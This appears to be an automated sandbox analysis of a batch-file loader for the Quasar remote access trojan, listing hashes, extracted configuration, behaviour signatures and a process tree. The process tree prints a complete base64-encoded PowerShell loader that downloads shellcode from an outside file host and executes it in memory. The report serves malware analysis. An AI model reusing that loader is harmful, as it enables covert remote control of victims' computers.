quasar | 0da69bfe85133738cfcd24c9381baeb0ff3c849b5fa995171407cc4a9ef1626b

Analysis

max time kernel
45s
max time network
48s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
30-06-2024 00:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

loader(1).bat
Size

6KB
MD5

dd28cb17a1e4540852af1452696640d0
SHA1

d4a954bc2fbae13ad5b0f8f78ea13714a8a00a39
SHA256

0da69bfe85133738cfcd24c9381baeb0ff3c849b5fa995171407cc4a9ef1626b
SHA512

e9ad278709c73dcc0a136de9ab275a4506ef812d530eb27b6620738321261e6f41540c163b2d7d8ed4844df96ecf7970001f561b0f225a71532f13d3896701cd
SSDEEP

192:B+Y+L2cE8Wc/Dz+KH32ywmC4cRpmVZfE1XzHxl/JXhCdyNhA:UE8Wc/DztH32y7C4Qp/lzRl/JXhDNhA

Score

10^/10

quasar office04 execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

127.0.0.1:4782

Mutex

b04ba2ce-b74d-409a-9f5c-bdaffe1644ec

Attributes

encryption_key
3C410D3A0BD1E76F9F4B11AD742F61FAE2E183E6
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar payload 1 IoCs

Processes:

resource yara_rule

behavioral1/memory/2124-263-0x0000023BF8AB0000-0x0000023BF8DD4000-memory.dmp family_quasar
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

29 2124 powershell.exe
30 2124 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2124 powershell.exe

resource	yara_rule
behavioral1/memory/2124-263-0x0000023BF8AB0000-0x0000023BF8DD4000-memory.dmp	family_quasar

flow	pid	process
29	2124	powershell.exe
30	2124	powershell.exe

pid	process
2124	powershell.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exefirefox.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Modifies registry class 1 IoCs

Processes:

firefox.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings firefox.exe
NTFS ADS 1 IoCs

Processes:

firefox.exe

description ioc process

File created C:\Users\Admin\Downloads\loader.bat:Zone.Identifier firefox.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

2124 powershell.exe
2124 powershell.exe
2124 powershell.exe
Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

firefox.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1464 firefox.exe
Token: SeDebugPrivilege 1464 firefox.exe
Token: SeDebugPrivilege 2124 powershell.exe
Token: SeDebugPrivilege 2124 powershell.exe
Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

firefox.exe

pid process

1464 firefox.exe
1464 firefox.exe
1464 firefox.exe
1464 firefox.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

firefox.exe

pid process

1464 firefox.exe
1464 firefox.exe
1464 firefox.exe
Suspicious use of SetWindowsHookEx 10 IoCs

Processes:

firefox.exe

pid process

1464 firefox.exe
1464 firefox.exe
1464 firefox.exe
1464 firefox.exe
1464 firefox.exe
1464 firefox.exe
1464 firefox.exe
1464 firefox.exe
1464 firefox.exe
1464 firefox.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings	firefox.exe

description	ioc	process
File created	C:\Users\Admin\Downloads\loader.bat:Zone.Identifier	firefox.exe

pid	process
2124	powershell.exe
2124	powershell.exe
2124	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1464	firefox.exe
Token: SeDebugPrivilege	1464	firefox.exe
Token: SeDebugPrivilege	2124	powershell.exe
Token: SeDebugPrivilege	2124	powershell.exe

pid	process
1464	firefox.exe
1464	firefox.exe
1464	firefox.exe
1464	firefox.exe

pid	process
1464	firefox.exe
1464	firefox.exe
1464	firefox.exe

pid	process
1464	firefox.exe
1464	firefox.exe
1464	firefox.exe
1464	firefox.exe
1464	firefox.exe
1464	firefox.exe
1464	firefox.exe
1464	firefox.exe
1464	firefox.exe
1464	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

firefox.exefirefox.exe

description	pid	process	target process
PID 1100 wrote to memory of 1464	1100	firefox.exe	firefox.exe
PID 1100 wrote to memory of 1464	1100	firefox.exe	firefox.exe
PID 1100 wrote to memory of 1464	1100	firefox.exe	firefox.exe
PID 1100 wrote to memory of 1464	1100	firefox.exe	firefox.exe
PID 1100 wrote to memory of 1464	1100	firefox.exe	firefox.exe
PID 1100 wrote to memory of 1464	1100	firefox.exe	firefox.exe
PID 1100 wrote to memory of 1464	1100	firefox.exe	firefox.exe
PID 1100 wrote to memory of 1464	1100	firefox.exe	firefox.exe
PID 1100 wrote to memory of 1464	1100	firefox.exe	firefox.exe
PID 1100 wrote to memory of 1464	1100	firefox.exe	firefox.exe
PID 1100 wrote to memory of 1464	1100	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2200	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2848	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2848	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2848	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2848	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2848	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2848	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2848	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2848	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2848	1464	firefox.exe	firefox.exe
PID 1464 wrote to memory of 2848	1464	firefox.exe	firefox.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\loader(1).bat"
1⤵
PID:2052

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1100

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1464

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1464.0.1711324742\1905344493" -parentBuildID 20230214051806 -prefsHandle 1816 -prefMapHandle 1808 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4b75cb5a-0e04-45eb-9c9f-a26894abc8de} 1464 "\\.\pipe\gecko-crash-server-pipe.1464" 1744 24e3c91ad58 gpu
3⤵
PID:2200

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1464.1.1771647258\153694682" -parentBuildID 20230214051806 -prefsHandle 2392 -prefMapHandle 2388 -prefsLen 22110 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {488602a2-72ec-4013-ad08-dabfec02f490} 1464 "\\.\pipe\gecko-crash-server-pipe.1464" 2404 24e28684d58 socket
3⤵
- Checks processor information in registry
PID:2848

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1464.2.1239315291\1429315540" -childID 1 -isForBrowser -prefsHandle 2744 -prefMapHandle 2716 -prefsLen 22148 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1ef01ea-ca91-4a3b-b66c-14c9fe16c846} 1464 "\\.\pipe\gecko-crash-server-pipe.1464" 2968 24e3f712e58 tab
3⤵
PID:4420

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1464.3.1831412371\752846482" -childID 2 -isForBrowser -prefsHandle 3580 -prefMapHandle 3576 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5113a869-3665-459b-8fcd-8f865c7bb733} 1464 "\\.\pipe\gecko-crash-server-pipe.1464" 3588 24e41fdcb58 tab
3⤵
PID:1892

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1464.4.1854080653\920223993" -childID 3 -isForBrowser -prefsHandle 5116 -prefMapHandle 5084 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {df786f02-427c-49c4-9f30-975a2a5c79f6} 1464 "\\.\pipe\gecko-crash-server-pipe.1464" 5036 24e44237658 tab
3⤵
PID:2484

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1464.5.1159000894\12087409" -childID 4 -isForBrowser -prefsHandle 5264 -prefMapHandle 5272 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {baea531f-cc50-4161-bfee-459014a9a8fb} 1464 "\\.\pipe\gecko-crash-server-pipe.1464" 5252 24e44235558 tab
3⤵
PID:3068

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1464.6.624436877\183539353" -childID 5 -isForBrowser -prefsHandle 5532 -prefMapHandle 5528 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {47ceb684-e369-4ada-a74d-5dd393a1b65f} 1464 "\\.\pipe\gecko-crash-server-pipe.1464" 5540 24e44237c58 tab
3⤵
PID:1004

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1464.7.1563534035\1290907297" -childID 6 -isForBrowser -prefsHandle 5472 -prefMapHandle 5824 -prefsLen 27774 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {53c9c65f-cae3-4f2b-be59-dae2a4a9e54d} 1464 "\\.\pipe\gecko-crash-server-pipe.1464" 5332 24e42052058 tab
3⤵
PID:4600

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1464.8.417997329\684450450" -childID 7 -isForBrowser -prefsHandle 5316 -prefMapHandle 5332 -prefsLen 27774 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f847117d-3b1f-47ae-a750-3471439220cc} 1464 "\\.\pipe\gecko-crash-server-pipe.1464" 5472 24e43a86e58 tab
3⤵
PID:1360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\loader.bat" "
1⤵
PID:4788

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -executionpolicy bypass -e ZgB1AG4AYwB0AGkAbwBuACAATABvAG8AawB1AHAARgB1AG4AYwAgAHsACgAgACAAIAAgAFAAYQByAGEAbQAgACgAJABtAG8AZAB1AGwAZQBOAGEAbQBlACwAIAAkAGYAdQBuAGMAdABpAG8AbgBOAGEAbQBlACkACgAgACAAIAAgACQAYQBzAHMAZQBtACAAPQAgACgAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ARwBlAHQAQQBzAHMAZQBtAGIAbABpAGUAcwAoACkAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4ARwBsAG8AYgBhAGwAQQBzAHMAZQBtAGIAbAB5AEMAYQBjAGgAZQAgAC0AQQBuAGQAIAAkAF8ALgBMAG8AYwBhAHQAaQBvAG4ALgBTAHAAbABpAHQAKAAnAFwAXAAnACkAWwAtADEAXQAuAEUAcQB1AGEAbABzACgAJwBTAHkAcwB0AGUAbQAuAGQAbABsACcAKQB9ACkALgBHAGUAdABUAHkAcABlACgAJwBNAGkAYwByAG8AcwBvAGYAdAAuAFcAaQBuADMAMgAuAFUAbgBzAGEAZgBlAE4AYQB0AGkAdgBlAE0AZQB0AGgAbwBkAHMAJwApAAoAIAAgACAAIAAkAHQAbQBwACAAPQAgACQAYQBzAHMAZQBtAC4ARwBlAHQATQBlAHQAaABvAGQAcwAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewBJAGYAKAAkAF8ALgBOAGEAbQBlACAALQBlAHEAIAAiAEcAZQB0AFAAcgBvAGMAQQBkAGQAcgBlAHMAcwAiACkAIAB7ACQAXwB9AH0AIAAKACAAIAAgACAAJABoAGEAbgBkAGwAZQAgAD0AIAAkAGEAcwBzAGUAbQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBHAGUAdABNAG8AZAB1AGwAZQBIAGEAbgBkAGwAZQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAQAAoACQAbQBvAGQAdQBsAGUATgBhAG0AZQApACkAOwAKACAAIAAgACAAWwBJAG4AdABQAHQAcgBdACAAJAByAGUAcwB1AGwAdAAgAD0AIAAwADsACgAgACAAIAAgAHQAcgB5ACAAewAKACAAIAAgACAAIAAgACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBGAGkAcgBzAHQAIABJAG4AdgBvAGsAZQAgAC0AIAAkAG0AbwBkAHUAbABlAE4AYQBtAGUAIAAkAGYAdQBuAGMAdABpAG8AbgBOAGEAbQBlACIAOwAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAPQAgACQAdABtAHAAWwAwAF0ALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAQAAoACQAaABhAG4AZABsAGUALAAgACQAZgB1AG4AYwB0AGkAbwBuAE4AYQBtAGUAKQApADsACgAgACAAIAAgAH0AYwBhAHQAYwBoACAAewAKACAAIAAgACAAIAAgACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBTAGUAYwBvAG4AZAAgAEkAbgB2AG8AawBlACAALQAgACQAbQBvAGQAdQBsAGUATgBhAG0AZQAgACQAZgB1AG4AYwB0AGkAbwBuAE4AYQBtAGUAIgA7AAoAIAAgACAAIAAgACAAIAAgACQAaABhAG4AZABsAGUAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBIAGEAbgBkAGwAZQBSAGUAZgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABAACgAJABuAHUAbABsACwAIAAkAGgAYQBuAGQAbABlACkAOwAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAPQAgACQAdABtAHAAWwAwAF0ALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAQAAoACQAaABhAG4AZABsAGUALAAgACQAZgB1AG4AYwB0AGkAbwBuAE4AYQBtAGUAKQApADsACgAgACAAIAAgAH0ACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAByAGUAcwB1AGwAdAA7AAoAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGcAZQB0AEQAZQBsAGUAZwBhAHQAZQBUAHkAcABlACAAewAKACAAIAAgACAAUABhAHIAYQBtACAAKABbAFAAYQByAGEAbQBlAHQAZQByACgAUABvAHMAaQB0AGkAbwBuACAAPQAgADAALAAgAE0AYQBuAGQAYQB0AG8AcgB5ACAAPQAgACQAVAByAHUAZQApAF0AIABbAFQAeQBwAGUAWwBdAF0AIAAkAGYAdQBuAGMALABbAFAAYQByAGEAbQBlAHQAZQByACgAUABvAHMAaQB0AGkAbwBuACAAPQAgADEAKQBdACAAWwBUAHkAcABlAF0AIAAkAGQAZQBsAFQAeQBwAGUAIAA9ACAAWwBWAG8AaQBkAF0AKQAKACAAIAAgACAAJAB0AHkAcABlACAAPQAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEQAZQBmAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAKAAnAFIAZQBmAGwAZQBjAHQAZQBkAEQAZQBsAGUAZwBhAHQAZQAnACkAKQAsACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBFAG0AaQB0AC4AQQBzAHMAZQBtAGIAbAB5AEIAdQBpAGwAZABlAHIAQQBjAGMAZQBzAHMAXQA6ADoAUgB1AG4AKQAuAEQAZQBmAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAKAAnAEkAbgBNAGUAbQBvAHIAeQBNAG8AZAB1AGwAZQAnACwAIAAkAGYAYQBsAHMAZQApAC4ARABlAGYAaQBuAGUAVAB5AHAAZQAoACcATQB5AEQAZQBsAGUAZwBhAHQAZQBUAHkAcABlACcALAAnAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBhAGwAZQBkACwAIABBAG4AcwBpAEMAbABhAHMAcwAsACAAQQB1AHQAbwBDAGwAYQBzAHMAJwAsACAAWwBTAHkAcwB0AGUAbQAuAE0AdQBsAHQAaQBjAGEAcwB0AEQAZQBsAGUAZwBhAHQAZQBdACkACgAgACAAIAAgACQAdAB5AHAAZQAuAEQAZQBmAGkAbgBlAEMAbwBuAHMAdAByAHUAYwB0AG8AcgAoACcAUgBUAFMAcABlAGMAaQBhAGwATgBhAG0AZQAsACAASABpAGQAZQBCAHkAUwBpAGcALAAgAFAAdQBiAGwAaQBjACcALABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEMAYQBsAGwAaQBuAGcAQwBvAG4AdgBlAG4AdABpAG8AbgBzAF0AOgA6AFMAdABhAG4AZABhAHIAZAAsACAAJABmAHUAbgBjACkALgBTAGUAdABJAG0AcABsAGUAbQBlAG4AdABhAHQAaQBvAG4ARgBsAGEAZwBzACgAJwBSAHUAbgB0AGkAbQBlACwAIABNAGEAbgBhAGcAZQBkACcAKQAKACAAIAAgACAAJAB0AHkAcABlAC4ARABlAGYAaQBuAGUATQBlAHQAaABvAGQAKAAnAEkAbgB2AG8AawBlACcALAAgACcAUAB1AGIAbABpAGMALAAgAEgAaQBkAGUAQgB5AFMAaQBnACwAIABOAGUAdwBTAGwAbwB0ACwAIABWAGkAcgB0AHUAYQBsACcALAAgACQAZABlAGwAVAB5AHAAZQAsACAAJABmAHUAbgBjACkALgBTAGUAdABJAG0AcABsAGUAbQBlAG4AdABhAHQAaQBvAG4ARgBsAGEAZwBzACgAJwBSAHUAbgB0AGkAbQBlACwAIABNAGEAbgBhAGcAZQBkACcAKQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAHQAeQBwAGUALgBDAHIAZQBhAHQAZQBUAHkAcABlACgAKQAgAAoAfQAKAAoAIwAgAFIARQBQAEwAQQBDAEUAIABMAEkATgBLAEgARQBSAEUAIABXAEkAVABIACAAWQBPAFUAUgAgAFMASABFAEwATABDAE8ARABFACAATABJAE4ASwAKAFsAQgB5AHQAZQBbAF0AXQAgACQAYgB1AGYAIAA9ACAAKABpAFcAcgAgAC0AVQBzAEUAYgAgACIAaAB0AHQAcABzADoALwAvAG8AcwBoAGkALgBhAHQALwB4AFAAYwBBAC8ASQB3AG4AUQAuAGIAaQBuACIAKQAuAGMAbwBuAHQAZQBuAHQACgAkAGwAcABNAGUAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAcwBoAGEAbABdADoAOgBHAGUAdABEAGUAbABlAGcAYQB0AGUARgBvAHIARgB1AG4AYwB0AGkAbwBuAFAAbwBpAG4AdABlAHIAKAAoAEwAbwBvAGsAdQBwAEYAdQBuAGMAIABrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACkALAAoAGcAZQB0AEQAZQBsAGUAZwBhAHQAZQBUAHkAcABlACAAQAAoAFsASQBuAHQAUAB0AHIAXQAsACAAWwBVAEkAbgB0ADMAMgBdACwAIABbAFUASQBuAHQAMwAyAF0ALAAgAFsAVQBJAG4AdAAzADIAXQApACgAWwBJAG4AdABQAHQAcgBdACkAKQApAC4ASQBuAHYAbwBrAGUAKABbAEkAbgB0AFAAdAByAF0AOgA6AFoAZQByAG8ALAAgACQAYgB1AGYALgBsAGUAbgBnAHQAaAAsACAAMAB4ADMAMAAwADAALAAgADAAeAA0ADAAKQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAGIAdQBmACwAIAAwACwAIAAkAGwAcABNAGUAbQAsACAAJABiAHUAZgAuAGwAZQBuAGcAdABoACkACgAkAGgAVABoAHIAZQBhAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoARwBlAHQARABlAGwAZQBnAGEAdABlAEYAbwByAEYAdQBuAGMAdABpAG8AbgBQAG8AaQBuAHQAZQByACgAKABMAG8AbwBrAHUAcABGAHUAbgBjACAAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAApACwAKABnAGUAdABEAGUAbABlAGcAYQB0AGUAVAB5AHAAZQAgAEAAKABbAEkAbgB0AFAAdAByAF0ALAAgAFsAVQBJAG4AdAAzADIAXQAsACAAWwBJAG4AdABQAHQAcgBdACwAIABbAEkAbgB0AFAAdAByAF0ALABbAFUASQBuAHQAMwAyAF0ALAAgAFsASQBuAHQAUAB0AHIAXQApACgAWwBJAG4AdABQAHQAcgBdACkAKQApAC4ASQBuAHYAbwBrAGUAKABbAEkAbgB0AFAAdAByAF0AOgA6AFoAZQByAG8ALAAwACwAJABsAHAATQBlAG0ALABbAEkAbgB0AFAAdAByAF0AOgA6AFoAZQByAG8ALAAwACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACkACgBbAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAcwBoAGEAbABdADoAOgBHAGUAdABEAGUAbABlAGcAYQB0AGUARgBvAHIARgB1AG4AYwB0AGkAbwBuAFAAbwBpAG4AdABlAHIAKAAoAEwAbwBvAGsAdQBwAEYAdQBuAGMAIABrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAgAFcAYQBpAHQARgBvAHIAUwBpAG4AZwBsAGUATwBiAGoAZQBjAHQAKQAsACgAZwBlAHQARABlAGwAZQBnAGEAdABlAFQAeQBwAGUAIABAACgAWwBJAG4AdABQAHQAcgBdACwAIABbAEkAbgB0ADMAMgBdACkAKABbAEkAbgB0AF0AKQApACkALgBJAG4AdgBvAGsAZQAoACQAaABUAGgAcgBlAGEAZAAsACAAMAB4AEYARgBGAEYARgBGAEYARgApAA==
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2124

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

